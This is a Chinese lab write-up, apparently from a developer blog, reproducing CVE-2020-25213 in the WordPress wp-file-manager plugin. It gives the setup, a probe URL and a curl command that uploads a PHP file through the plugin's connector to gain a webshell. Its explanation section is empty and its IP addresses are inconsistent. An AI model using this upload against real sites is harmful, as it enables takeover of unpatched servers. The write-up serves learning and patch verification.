CVE-2020-25213 WordPress远程代码执行漏洞复现
0x00 漏洞介绍
WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。而WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。
0x01 漏洞环境
- 攻击机:192.168.75.178 kali-2021
- 目标机+网站管理员:192.168.91.137 Ubuntu 18.04 server64
- 工具:https://192.168.91.137:10000、火狐浏览器(CSRF漏洞复现时,不能使用谷歌浏览器,谷歌浏览器自带屏蔽CSRF)
- wp-file-manager版本:6.9
0x02 漏洞搭建
1、下载wordpress和插件
wordpress
:https://wordpress.org/download/
file-manager6.0
:https://wordpress.org/plugins/wp-file-manager/advanced/
2、然后搭建数据库、添加写入权限,注册管理员账号密码等完成安装
username:wordpress
password:vJknM3*1XtUBrqy3eU
3、加载插件,直接将插件拖入到网站根目录解压
4、在网站激活
0x03 影响范围
WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本
0x04 漏洞条件
Wordpress CMS、php、mysql版本没限制,只要能搭建起来网站,并且插件的版本在6.0-6.8即可
0x05 漏洞原理
0x06 漏洞复现
1、访问http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
出现{"error":["errUnknownCmd"]}
即漏洞存在
2、新建一个test.php
,内容为<?php phpinfo()?>
cd Desktop
echo "<?php phpinfo()?>" > test.php
3、之后在终端输入下面的命令:
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
4、访问下面的链接,成功获得webshell
http://192.168.75.178/wp-content/plugins/wp-file-manager/lib/files/test.php
0x07 漏洞修复建议
升级插件版本即可
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探